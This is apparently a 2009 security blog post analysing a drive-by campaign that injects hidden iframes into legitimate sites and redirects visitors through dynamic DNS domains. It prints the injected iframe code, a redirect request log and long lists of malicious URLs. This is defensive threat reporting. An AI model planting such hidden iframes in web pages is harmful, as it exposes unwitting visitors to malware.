Tuesday, 13 October 2009

Drive-by campaign using dynamic DNS domains

Since Monday a new drive-by campaign is making the round which is using dynamic DNS domains of DynDNS and No-IP to spread malware.
The drive-by campaign consists of three different stages illustrated below:
dynamicdnscampaign
*** First stage***
The first stage is always the same on all drive-by campaigns: The cybercriminals injects malicious code into legitimate websites (mostly using stolen FTP credentials, see “An Iframer for Dummies”). In this case the malicious code is a iframe which is pointing to a malicious domain for the second stage. The Iframe can look like this:
<iframe src="http://aakinci.kicks-ass.net:8080/ts/in.cgi?open3" width=248 height=0 style="visibility: hidden"></iframe>
<iframe src="http://aaaauto.servebbs.net:8080/ts/in.cgi?open2" width=625 height=0 style="visibility: hidden"></iframe>
As you can see above, for this purpose the cybercriminals are using dynamic DNS domains names in the Iframes.
*** Second stage***
The second stage is the URL to which an iframe from the first stage is pointing to. The URL comes along with one of the following parameter, which will be given to in.cgi:
For example:
/ts/in.cgi?open1
/ts/in.cgi?open2
/ts/in.cgi?open3
/ts/in.cgi?open4
/ts/in.cgi?open5
/ts/in.cgi?open6
/ts/in.cgi?open7
If a user visits a infected website with such a malicious iframe, the in.cgi script tries to set three cookies for the domain traffcount.cn (222.73.37.203 – CHINANET-SH) and sends a HTTP 302 (redirect) back to the victims browser.
Here’s an example of such a request:
GET http://senmu.homeftp.net:8080/ts/in.cgi?open4
Resolving senmu.homeftp.net… 79.143.129.13
Connecting to senmu.homeftp.net|79.143.129.13|:8080… connected.
HTTP request sent, awaiting response… 302 Found
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn
Cookie coming from senmu.homeftp.net attempted to set domain to traffcount.cn
Location: http://magalieroy.sytes.net:8080/index.php [following]
…with the following HTML content:
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL=’http://magalieroy.sytes.net:8080/index.php’">
</head>
<body>
document moved <a href="http://magalieroy.sytes.net:8080/index.php">here</a>
</body>
</html>
…and the following cookies (one per line):
senmu.homeftp.net:8080 FALSE / FALSE [number] SL_default_0000 _1_
senmu.homeftp.net:8080 FALSE / FALSE [number] TSUSER open4
senmu.homeftp.net:8080 FALSE / FALSE [number] SL_open4_0000
Until now I’ve seen the following dynamic DNS domains which are acting as “redirector” in the second stage:
Redirecting URLs (second stage)
http://aaburke.dynalias.org/ts/in.cgi?open
http://aandrioli.servebbs.net:8080/ts/in.cgi?open
http://a2stu.blogdns.com:8080/ts/in.cgi?open
http://aakinci.kicks-ass.net:8080/ts/in.cgi?open
http://a77mo.dyndns.biz:8080/ts/in.cgi?open
http://aaronpoon.is-a-geek.com:8080/ts/in.cgi?open
http://senmu.homeftp.net:8080/ts/in.cgi?open
http://a151.scrapping.cc:8080/ts/in.cgi?open
http://styleorient.dnsalias.org:8080/ts/in.cgi?open
http://aaa689.selfip.com:8080/ts/in.cgi?open
http://aaaauto.servebbs.net:8080/ts/in.cgi?open
http://timofey78.myvnc.com:8080/ts/in.cgi?open
http://a555eo.dontexist.net/ts/in.cgi?open
http://sunshinecoasttours.selfip.net/ts/in.cgi?open
http://ahmet.servehttp.com/ts/in.cgi?open
http://aabatyshkin.dontexist.net/ts/in.cgi?open
http://ilana223.servebeer.com/ts/in.cgi?open
http://maloos.selfip.com/ts/in.cgi?open
Each of these redirection domains seems to select a target URL as redirection for the third stage. For this purpose every redirection URL has a pool of ten target URLs to choose from (some kind of a domain set), and this pool is changed every hour.
*** Third stage ***
As mentioned before, the dynamic DNS domains used by the third stage will change frequently (using different domain sets and HTTP 302). One would expect the target domains to contain malicious code that exploits vulnearable web browsers and browser plugins used by the visitors. BUT actually they are neither serving contents nor exploits – just blank pages:
Target URLs (third stage)
http://alfredhaloci.servehttp.com:8080/index.php
http://elajjouri1980.thruhere.net:8080/index.php
http://svfokin.servehalflife.com:8080/index.php
http://hafidiab.bounceme.net:8080/index.php
http://lccsondl.servegame.com:8080/index.php
http://enotxl.boldlygoingnowhere.org:8080/index.php
http://bartgreer.serveirc.com:8080/index.php
http://andreasavarese.sytes.net:8080/index.php
http://jedrekmich.selfip.info:8080/index.php
http://andreamaica.myftp.org:8080/index.php
http://halpertgabor.serveirc.com:8080/index.php
http://andreamaica.myftp.org:8080/index.php
http://ndoy70.sytes.net:8080/index.php
http://bartgreer.serveirc.com:8080/index.php
http://abdcheggouri.dnsalias.net:8080/index.php
http://abaqui.servebbs.com:8080/index.php
http://inezh.gotdns.org:8080/index.php
http://tanyamironenko.serveblog.net:8080/index.php
http://stefan.servehalflife.com:8080/index.php
http://arkadiz.blogdns.com:8080/index.php
http://assistem.myftp.org:8080/index.php
http://crni.servegame.com:8080/index.php
http://petrenkoma.servegame.com:8080/index.php
http://meboubaroud.homedns.org:8080/index.php
http://ladoga25.bounceme.net:8080/index.php
http://magalieroy.sytes.net:8080/index.php
http://anekon.dnsdojo.net:8080/index.php
A full list of the malicious domains used by this drive by campaign in the third stage can be found here: www.abuse.ch/downloads/dyndns_driveby.txt (currently I already caputred more than 1′500 uniq domains which are assoiciated with this drive-by campaign). The list will be updated permanently using a script.
Conclusion
The strange thing is that the malicious domains currently doesn’t serve any kind of exploits/malware. So the question is why the cybercriminals are injecting malicious Iframes in thousands of legitimate websites while the drive-by infection doesn’t work? While several explanations like geoIP dependencies exist, the following one sounds most reasonable: They want to inject the malicious iframes in as many sites as possible. As soon as they have infected enough websites, they will put exploits on to the dynamic DNS domains which are currently just hosting a blank page. The benefit of it could be that AV-vendors are not able to get any exploits or malware before the cybercriminals “activate” the attack. Though the security industry might track the threat, they would be unable to react onto it while the attack has not been launched (don’t forget the domain flux which the domains are using).
Dynamic DNS domains are more and more used for this kind of attacks. Maybe it’s time for us to reconsider firewall policies of corporate networks concerning access to them?
UPDATE 2009-09-14
It seems that this drive-by campaign spreads a variant of the Bredolab trojan.

emails

a

The Register - Security

IQ test

The Register - Security: Anti-Virus

HackWire - Hacker News